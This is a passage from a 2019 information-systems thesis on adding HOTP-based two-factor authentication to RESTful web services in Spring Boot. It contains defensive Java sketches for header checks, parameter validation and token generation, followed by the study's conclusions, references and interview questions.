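            String accessToken = request.getHeader("Access-Token");  // second factor (HOTP)
            if (apiKey == null || accessToken == null) {
                response.setStatus(HttpServletResponse.SC_UNAUTHORIZED);
                return false;                                        // reject the request
            }
        }
        return true;                                                 // let the controller run
    }
}

In a real application the interceptor would additionally have to be registered through a WebMvcConfigurer so that it runs before every annotated handler.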

Parameters

At this point it is already known that the resource being consumed exists, is correct, and that the client in question has permission to request it. The next step was to validate whether the request itself is valid, that is, whether the client has supplied all the information necessary for the action to be performed. The validators confirmed that parameter checking was done correctly at all endpoints. Sample code is illustrated below:

Figure not included in this excerpt
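
The following sketch, assuming the Bean Validation starter is on the classpath, shows how such a parameter check can be expressed declaratively; the request-body class, its field names and the route are hypothetical.

import javax.validation.Valid;
import javax.validation.constraints.Email;
import javax.validation.constraints.NotBlank;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.*;

// Hypothetical request body: both parameters must be present and well formed
// before the endpoint logic is executed.
class UpdateEmailRequest {
    @NotBlank
    public String studentNumber;

    @NotBlank
    @Email
    public String newEmail;
}

@RestController
class StudentEmailParameterCheck {

    @PutMapping("/api/v1/students/email")
    public ResponseEntity<String> updateEmail(@Valid @RequestBody UpdateEmailRequest body) {
        // Reaching this point means Spring has already rejected requests
        // with missing or malformed parameters (HTTP 400).
        return ResponseEntity.ok("Parameters accepted");
    }
}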

Pre-state

The pre-state step was carried out to ensure that changes cannot occur after a request has already been handled. For example, a change of student email cannot happen when it has already been made and the session closed. This was achieved by setting conditions at each endpoint to control changes to the data. Taking the email update as an example, the code shows the conditions that all have to be met before the change is effected by the student profile controller.

Figure not included in this excerpt
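
A minimal sketch of such a pre-state condition check is shown below; the class, method and session abstraction are hypothetical stand-ins for the conditions set in the actual controller.

import org.springframework.http.HttpStatus;
import org.springframework.http.ResponseEntity;

// Hypothetical pre-state check: the update is only applied if the session is
// still open and the requested change has not already been made.
public class PreStateCheck {

    public ResponseEntity<String> changeEmail(StudentSession session,
                                              String currentEmail,
                                              String requestedEmail) {
        if (!session.isActive()) {
            // The session was already closed, so no further changes are accepted.
            return new ResponseEntity<>("Session expired", HttpStatus.CONFLICT);
        }
        if (currentEmail.equalsIgnoreCase(requestedEmail)) {
            // The change has already been effected; repeating it is rejected.
            return new ResponseEntity<>("Email already up to date", HttpStatus.CONFLICT);
        }
        return new ResponseEntity<>("Pre-state conditions satisfied", HttpStatus.OK);
    }

    // Minimal stand-in for the session object assumed by this sketch.
    interface StudentSession {
        boolean isActive();
    }
}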

Post-status

In this step, the experts had to certify that after all changes are completed the service, resource or entity is still valid. The fact that some profile data can be changed, even to valid values, does not mean that the profile will still be valid after the change. To meet this requirement, a self-validation class was created for each endpoint so that the validity of a resource is checked after every change. With reference to the student email example, this was implemented as shown in the code, which is then called in the student profile controller.

Figure not included in this excerpt
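
The sketch below suggests what such a self-validation class might look like; the class name, method and validation rules are assumptions for illustration only.

// Hypothetical self-validation class called by the controller after an update,
// confirming that the profile is still a valid resource once the change is applied.
public class StudentProfileValidator {

    public boolean isValidAfterChange(String studentNumber, String email) {
        // The profile remains valid only if its identifying fields are still usable.
        return studentNumber != null && !studentNumber.trim().isEmpty()
                && email != null && email.matches("^[^@\\s]+@[^@\\s]+\\.[^@\\s]+$");
    }
}

In the controller, the validator would be invoked immediately after the change is persisted, and the update rejected or rolled back if it returns false.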

CHAPTER FIVE:

SUMMARY, CONCLUSION AND RECOMMENDATIONS

5.1 Introduction

This chapter summarizes the study in three sub-sections: summary of findings, conclusion and recommendations, the last of which also suggests future work and implementation.

5.2 Summary of Findings

This section summarizes how the objectives of the study were fulfilled. The study had four specific objectives that had to be achieved in order to attain the main objective.

To study and review existing literature related to RESTful web services and information security, thereby identifying loopholes and determining requirements for an improved authentication mechanism in RESTful web services: this was achieved mainly through two methods. Primary data collection, in which system users and developers were engaged and interviewed, enabled the researcher to collect primary data about the University and its underlying systems and thus identify the user requirements of the system to be developed. Secondary data was collected through literature and document review, which helped identify technical loopholes in the current systems and in RESTful web services and thus facilitated the identification of possible solutions for developing enhanced features. The literature revealed that RESTful web services have loopholes and that they base their authentication on techniques such as Digest and API-key authentication. These mechanisms have been in place and do work; however, they are not able to secure the service from threats and attacks such as cross-site scripting and injection. The literature also showed that the use of two-factor authentication in web applications has helped stop and control such threats. The study therefore deemed it appropriate to use two-factor authentication in REST services to control these threats.

To design an improved authentication mechanism in web services based on the requirements identified in the literature review, and hence come up with blueprints of an improved authentication mechanism for REST: this objective was realized by employing object-oriented designs, including class diagrams, sequence diagrams and state diagrams. These design tools were used because they capture all object-oriented features.

To implement the logical designs of an improved secure authentication mechanism for RESTful web services: based on the design models from objective two, a secure two-factor authentication mechanism was developed using the Java Spring Boot framework, in which four main classes were developed to generate, verify and pass on the access token as a JSON message in the HTTP header. Furthermore, the HTTP header was extended to accommodate the new parameter "Access Token", which is generated using the HMAC-HOTP algorithm.
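
Although the actual classes are not reproduced in this excerpt, the following minimal sketch shows the core of HOTP token generation as specified in RFC 4226, which the generator described above follows; the class name HotpSketch and the six-digit token length are illustrative assumptions.

import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;
import java.nio.ByteBuffer;
import java.nio.charset.StandardCharsets;

// Minimal HOTP (RFC 4226) sketch: HMAC-SHA1 over an 8-byte counter,
// dynamically truncated to a 6-digit access token.
public class HotpSketch {

    public static String generate(byte[] sharedSecret, long counter) throws Exception {
        byte[] counterBytes = ByteBuffer.allocate(8).putLong(counter).array();

        Mac mac = Mac.getInstance("HmacSHA1");
        mac.init(new SecretKeySpec(sharedSecret, "HmacSHA1"));
        byte[] hash = mac.doFinal(counterBytes);

        // Dynamic truncation as defined in RFC 4226, Section 5.3.
        int offset = hash[hash.length - 1] & 0x0F;
        int binary = ((hash[offset] & 0x7F) << 24)
                   | ((hash[offset + 1] & 0xFF) << 16)
                   | ((hash[offset + 2] & 0xFF) << 8)
                   |  (hash[offset + 3] & 0xFF);

        return String.format("%06d", binary % 1_000_000);
    }

    public static void main(String[] args) throws Exception {
        byte[] secret = "12345678901234567890".getBytes(StandardCharsets.US_ASCII);
        // RFC 4226 Appendix D lists 755224 as the HOTP value for this secret and counter 0.
        System.out.println(generate(secret, 0));
    }
}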

To test and validate whether the developed authentication mechanism secures web services and improves the security of RESTful services: this was carried out using JUnit testing, in which each method of each class was tested to ensure that it produced the expected output and ran without errors for all the test cases that were simulated. The test cases were built around the three JUnit classes Assert, TestCase and TestResult. Once the service and authentication mechanism were confirmed to be working, they were handed over to experts in web service and web application security to validate whether the proposed mechanism was fit for purpose. The validation process was guided by a validation guide developed by the researcher. The results were collected and compared with current REST authentication implementations. The comparison showed that two-factor authentication works relatively better than single API-key authentication and verification of URIs alone.

5.3 Conclusion

The study was carried out to identify loopholes in RESTful web services. With security being the main factor identified from the literature, the study considered multi-factor authentication, which is commonly used with web applications to ensure authentic access. Since the proposed RESTful web service is intended to integrate systems and applications with other systems, there is no human intervention when the systems communicate, which makes it hard to implement multi-factor authentication. The study therefore benchmarked the use of API keys and OAuth mechanisms to implement an enhanced multi-factor authentication that uses the HOTP algorithm to generate an access token for the client application and to verify the token it returns. The proposed mechanism was developed using Java technologies alongside JSON and HTTP, then tested and the results reported. The results showed that two-factor authentication between applications is hard to implement, since it requires modifying the HTTP header and sending an acknowledgement of the initial request. However, it proved more effective than single API-key authentication, because the requesting application is additionally checked on whether it intended to send the request and whether it is an authentic application.

5.4 Recommendations

The study revealed that a number of institutions still use traditional system architectures and that the few trying to migrate to new architectures are struggling. It is therefore recommended that organizations and institutions migrate from traditional architectures to newer ones such as micro-services, in order to reap the numerous merits of these technologies. Furthermore, system integration should be treated as a key factor in an organization's information-system strategy. System integration ensures interoperability and easy sharing of, or access to, information by the different stakeholders. Additionally, when systems are integrated, organizations may not need to migrate the large volumes of sensitive and useful data housed in their legacy systems; data migration is often a tedious activity that disrupts daily organizational operations. When integrating systems, it is argued that an organization should use a service-oriented architecture, as it does not change the underlying applications but rather creates an environment of interoperability and simplicity, especially when the REST architectural style is used.

The developed security mechanism is recommended for organizations that use RESTful web services to integrate systems. It should be noted that the mechanism caters for endpoint security only. To make it more effective, it is therefore recommended that the developed mechanism be deployed over TLS/SSL at the transport layer to secure transmission of the URI.

5.5 Suggestions for Further Research

Security is an ever-growing demand in computing, and with the increasing use of the Internet, managing secure applications is key. Further research is therefore recommended to improve the security of web applications and services. This study focused on introducing an automated multi-factor authentication to secure RESTful web services; however, this only guarantees the security of the request URI. Future work can address the security of the response: when a client requests data, the response given to the client application should also be verifiably authentic. This could be done by reversing the three-way handshake mechanism.

References

Amit, Y., Hay, R., Saltzman, R. and Sharabani, A., International Business Machines Corp, 2011. Thwarting cross-site request forgery (csrf) and clickjacking attacks. U.S. Patent Application 12/825,290.

Ao, S. and Gelman, L. (2011). Electronic Engineering and Computing Technology. 90th ed. Taipei: Springer.

Austin, D., Barbir, A., Ferris, C. and Garg, S. (2014). Web Services Architecture Requirements. [online] w3.org. Available at: https://www.w3.org/TR/2004/NOTE-wsa-reqs-20040211/#id2605016 [Accessed 15 Jun. 2019].

Bengtsson, M., 2016. How to plan and perform a qualitative study using content analysis. NursingPlus Open, 2, pp.8-14.

Bisht, P., Hinrichs, T., Skrupsky, N., Bobrowicz, R. and Venkatakrishnan, V.N., 2010, October. NoTamper: automatic blackbox detection of parameter tampering opportunities in web applications. In Proceedings of the 17th ACM conference on Computer and communications security (pp. 607-618). ACM.

Brandom, R. (2019). Two-factor authentication is a mess. [online] The Verge. Available at: https://www.theverge.com/2017/7/10/15946642/two-factor-authentication-online-security-mess [Accessed 18 Jul. 2019].

Bucchiarone, A., Dragoni, N., Dustdar, S., Larsen, S.T. and Mazzara, M., 2018. From monolithic to micro-services: an experience report from the banking domain. IEEE Software, 35(3), pp.50-55.

Caviglione, L., Coccoli, M. and Merlo, A., 2014. A taxonomy-based model of security and privacy in online social networks. IJCSE, 9(4), pp.325-338.

Cerny, T., Donahoo, M. J. and Pechanec, J. (2017) ‘Disambiguation and Comparison of SOA, Micro-services and Self-Contained Systems’, pp. 228-235. doi: 10.1145/3129676.3129682.

Chen, E.Y., Pei, Y., Chen, S., Tian, Y., Kotcher, R. and Tague, P., 2014, November. Oauth demystified for mobile application developers. In Proceedings of the 2014 ACM SIGSAC conference on computer and communications security (pp. 892-903). ACM.

Conrad, E., Misenar, S. and Feldman, J., 2016. Eleventh Hour CISSP®: Study Guide. Syngress.

Crotty, J. and Horrocks, I., 2017. Managing legacy system costs: A case study of a meta-assessment model to identify solutions in a large financial services company. Applied Computing and Informatics, 13(2), pp.175-183.

De Backere, F., Hanssens, B., Heynssens, R., Houthooft, R., Zuliani, A., Verstichel, S., Dhoedt, B. and De Turck, F., 2014, May. Design of a security mechanism for RESTful Web Service communication through mobile clients. In 2014 IEEE Network Operations and Management Symposium (NOMS) (pp. 1-6). IEEE.

De, B., 2017. API Management. In API Management (pp. 15-28). Apress, Berkeley, CA.

Dragoni, N., Giallorenzo, S., Lafuente, A.L., Mazzara, M., Montesi, F., Mustafin, R. and Safina, L., 2017. Micro-services: Yesterday, Today, and Tomorrow. Present and Ulterior Software Engineering, p.195.

El-Fotouh, M. and Diepold, K. (2008). The Substitution Cipher Chaining Mode. In Proceedings of the International Conference on Security and Cryptography, pp.421-429.

Fowler, M. (2015). Patterns of enterprise application architecture. 1st ed. Boston, Mass.: Addison-Wesley.

Gorski, P.L., Iacono, L.L., Nguyen, H.V. and Torkian, D.B., 2014, June. Service security revisited. In 2014 IEEE International Conference on Services Computing (pp. 464-471). IEEE.

Gupta, S. and Gupta, B.B., 2017. Cross-Site Scripting (XSS) attacks and defense mechanisms: classification and state-of-the-art. International Journal of System Assurance Engineering and Management, 8(1), pp.512-530.

Habibullah, S., Liu, X. and Tan, Z., 2018. An Approach to Evolving Legacy Enterprise System to Microservice-Based Architecture through Feature-Driven Evolution Rules. International Journal of Computer Theory and Engineering, 10(5).

Halili, F. and Ramadani, E., 2018. Web services: a comparison of SOAP and REST services. Modern Applied Science, 12(3), p.175.

IBM (n.d.) ‘How IBM leads building hybrid cloud solutions : Implementing the CSCC Customer Cloud Architecture for API Management’, pp. 1-25.

Jamshidi, P., Pahl, C., Mendonça, N.C., Lewis, J. and Tilkov, S., 2018. Micro-services: The journey so far and challenges ahead. IEEE Software, 35(3), pp.24-35.

Jimenez, W., Mammar, A. and Cavalli, A., 2009. Software vulnerabilities, prevention and detection methods: A review. Security in Model-Driven Architecture, p.6.

Kalske, M., 2017. Transforming monolithic architecture towards microservice architecture. University of Helsinki Press.

Laudon, K. and Laudon, J. (2007). Management information systems: Managing the digital Firm. 10th ed. Prentice Hall.

Lavrakas, P.J., 2008. Encyclopedia of survey research methods. Sage Publications.

Lee, H. and Mehta, M.R., 2013. Defense Against REST-based Web Service Attacks for Enterprise Systems. Communications of the IIMA, 13(1), Article 5.

Lee, S., Jo, J.Y. and Kim, Y., 2017. Authentication system for stateless RESTful Web service. Journal of Computational Methods in Sciences and Engineering, 17(S1), pp.S21-S34.

Leedy, P.D. and Ormrod, J.E., 1993. Practical Research Planning.

Li, W., Mitchell, C.J. and Chen, T., 2019. OAuthGuard: Protecting User Security and Privacy with OAuth 2.0 and OpenID Connect. arXiv preprint arXiv:1901.08960.

Li, X. and Xue, Y., 2014. ACM Computing Surveys (CSUR), 46(4), p.54.

Lo Iacono, L., Nguyen, H.V. and Gorski, P.L., 2019. On the Need for a General REST-Security Framework. Future Internet, 11(3), p.56.

Lu, N., Glatz, G. and Peuser, D., 2019. Moving mountains - practical approaches for moving monolithic applications to Micro-services. The International Conference on Micro-services, Dortmund.

Mumbaikar, S. and Padiya, P., 2013. Web services based on SOAP and REST principles. International Journal of Scientific and Research Publications, 3(5), pp.1-4.

Mumtaz, A. and Hadi, S., 2012. Developing a Three-tier Web Data Management Application for Higher Education Admission Environment. International Arab Journal of e-Technology, Vol.2, No.4. Page 175-180.

Nguyen, H.V., Tolsdorf, J. and Iacono, L.L., 2017, August. On the security expressiveness of REST-based API definition languages. In International Conference on Trust and Privacy in Digital Business (pp. 215-231). Springer, Cham.

Nordbotten, N.A., 2009. XML and web services security standards. IEEE Communications Surveys and Tutorials, 11(3), pp.4-21.

Perforce Software Inc. (2014). Considerations for API Requirements | Akana. [online] Akana.com. Available at: https://www.akana.com/blog/considerations-api-requirements [Accessed 4 Jun. 2019].

Petrus, A. (2019). How to extract data from a 2FA iCloud account. [Online] Iphonebackupextractor.com. Available at: https://www.iphonebackupextractor.com/blog/ex [Accessed 9 May 2019].

Regoniel, P.A., 2015. Conceptual framework: a step by step guide on how to make one. SimplyEducate. Me.

Rosenblatt, S. 2019. Two-factor authentication: What you need to know (FAQ). [Online] CNET. Available at: https://www.cnet.com/news/two-factor-authentication-what-you-need-to-know-faq/ [Accessed 12 Jun. 2019].

Techopedia.com. 2019. System Requirements. [Online] Available at: https://www.techopedia.com/definition/4371/system-requirements [Accessed 6 Jun. 2019].

Tihomirovs, J. and Grabis, J., 2016. Comparison of SOAP and REST based web services using software evaluation metrics. Information Technology and Management Science, 19(1), pp.92-97.

Thomas, A. and Gupta, A. (2016) 'Retire the Three-Tier Application Architecture to Move Toward Digital Business', (June). Available at: https://www.gartner.com/binaries/content/assets/events/keywords/applications/apps20i/retire_the_threetier_applica_308298.pdf.

M'Raihi, D., Bellare, M., Hoornaert, F., Naccache, D. and Ranen, O. (2005). RFC 4226 - HOTP: An HMAC-Based One-Time Password Algorithm. [Online] Tools.ietf.org. Available at: https://tools.ietf.org/html/rfc4226#section-5 [Accessed 5 Jun. 2019].

Walker, R., 1985. Applied qualitative research. Gower Pub Co.

Appendices

Appendix 1

Figure not included in this excerpt

Appendix 2

Figure not included in this excerpt

Appendix 3

Figure not included in this excerpt

Appendix 4

Figure not included in this excerpt

Appendix 5 Standard Error Codes

Figure not included in this excerpt

Interview by: Luyima Alex

Questions:

System (Naïve) Users

1. Gender of the respondents
2. What is your role in Ndejje University?
3. Have you worked with any Information Management System within the University?
4. What activities/tasks did you do with the system?
5. Were you able to execute all the tasks?
6. Were you able to access all the required information for the tasks in one system?
7. How do you share data with other users using other systems?
8. What would be your recommendation to improve the current system (processes)?

Technical user (Developers)

1. How best can the system be integrated?
2. Why are you recommending that style?
3. What languages would you recommend to implement the proposed method of integration?
4. Is security a factor during the integration of these systems? Why?

[...]

End of excerpt from 84 pages

Details

Title
Enhancing RESTful Web Service Security with a Multi-Factor Authentication Mechanism
Course
Information Systems
Grade
15.0
Author
Year
2019
Pages
84
Catalog Number
V962688
ISBN (eBook)
9783346317148
ISBN (Book)
9783346317155
Language
English
Keywords
enhancing, restful, service, security, multi-factor, authentication, mechanism
Quote paper
Alex Luyima Cedric (Author), 2019, Enhancing RESTful Web Service Security with a Multi-Factor Authentication Mechanism, Munich, GRIN Verlag, https://www.grin.com/document/962688
